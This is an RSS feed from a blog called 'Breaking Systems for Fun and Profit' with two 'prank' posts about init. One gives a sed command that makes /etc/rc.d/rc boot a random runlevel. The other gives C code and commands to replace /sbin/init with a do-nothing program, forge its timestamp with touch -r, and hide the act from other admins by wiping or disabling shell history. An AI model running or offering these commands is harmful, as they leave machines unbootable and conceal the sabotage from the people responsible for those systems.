<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Breaking Systems for Fun and Profit &#187; init</title>
	<atom:link href="http://breakingsystemsforfunandprofit.com/archives/tag/init/feed" rel="self" type="application/rss+xml" />
	<link>http://breakingsystemsforfunandprofit.com</link>
	<description>You _can_ stop the signal.</description>
	<lastBuildDate>Mon, 17 May 2010 09:58:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Now that&#8217;s a proper startup</title>
		<link>http://breakingsystemsforfunandprofit.com/archives/199</link>
		<comments>http://breakingsystemsforfunandprofit.com/archives/199#comments</comments>
		<pubDate>Mon, 17 May 2010 09:58:45 +0000</pubDate>
		<dc:creator>Mule</dc:creator>
				<category><![CDATA[Init Influences]]></category>
		<category><![CDATA[init]]></category>
		<category><![CDATA[rc]]></category>
		<category><![CDATA[sed]]></category>
		<category><![CDATA[startup]]></category>

		<guid isPermaLink="false">http://breakingsystemsforfunandprofit.com/?p=199</guid>
		<description><![CDATA[sed -i 's/runlevel=&#34;\$argv1&#34;/runlevel=&#34;\$\[\{RANDOM\} % 7 \]&#34;/' /etc/rc.d/rc]]></description>
			<content:encoded><![CDATA[
<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">sed</span> <span style="color: #660033;">-i</span> <span style="color: #ff0000;">'s/runlevel=&quot;\$argv1&quot;/runlevel=&quot;\$\[\{RANDOM\} % 7 \]&quot;/'</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>rc.d<span style="color: #000000; font-weight: bold;">/</span>rc</pre></div></div>

]]></content:encoded>
			<wfw:commentRss>http://breakingsystemsforfunandprofit.com/archives/199/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SImplify your init</title>
		<link>http://breakingsystemsforfunandprofit.com/archives/128</link>
		<comments>http://breakingsystemsforfunandprofit.com/archives/128#comments</comments>
		<pubDate>Sun, 09 Aug 2009 08:40:11 +0000</pubDate>
		<dc:creator>Mule</dc:creator>
				<category><![CDATA[Kernel Capers]]></category>
		<category><![CDATA[init]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[submitted]]></category>

		<guid isPermaLink="false">http://breakingsystemsforfunandprofit.com/?p=128</guid>
		<description><![CDATA[This one was submitted by fl0_: Create a file called init.c #include &#60;stdio.h&#62; &#160; int main&#40;&#41;&#123; &#160; printf&#40;&#34;MOEHAHAHHAAAA\n&#34;&#41;; return 0; &#125; Next run the following commands: gcc -o init init.c touch -r /sbin/init init cp -f init /sbin/init You might want to hide your handiwork from the other admins by either removing ~/.bash_history(obvious)/running set +o [...]]]></description>
			<content:encoded><![CDATA[<p>This one was submitted by <strong>fl0_</strong>:</p>
<p>Create a file called <code>init.c</code></p>

<div class="wp_syntax"><div class="code"><pre class="c" style="font-family:monospace;"><span style="color: #339933;">#include &lt;stdio.h&gt;</span>
&nbsp;
<span style="color: #993333;">int</span> main<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
&nbsp;
       <span style="color: #000066;">printf</span><span style="color: #009900;">&#40;</span><span style="color: #ff0000;">&quot;MOEHAHAHHAAAA<span style="color: #000099; font-weight: bold;">\n</span>&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
       <span style="color: #b1b100;">return</span> <span style="color: #0000dd;">0</span><span style="color: #339933;">;</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>Next run the following commands:</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> init init.c
<span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #660033;">-r</span> <span style="color: #000000; font-weight: bold;">/</span>sbin<span style="color: #000000; font-weight: bold;">/</span>init init
<span style="color: #c20cb9; font-weight: bold;">cp</span> <span style="color: #660033;">-f</span> init <span style="color: #000000; font-weight: bold;">/</span>sbin<span style="color: #000000; font-weight: bold;">/</span>init</pre></div></div>

<p>You might want to hide your handiwork from the other admins by either removing <code>~/.bash_history</code>(obvious)/running <code>set +o history</code> before you begin/<code>kill -9 $$</code></p>
]]></content:encoded>
			<wfw:commentRss>http://breakingsystemsforfunandprofit.com/archives/128/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
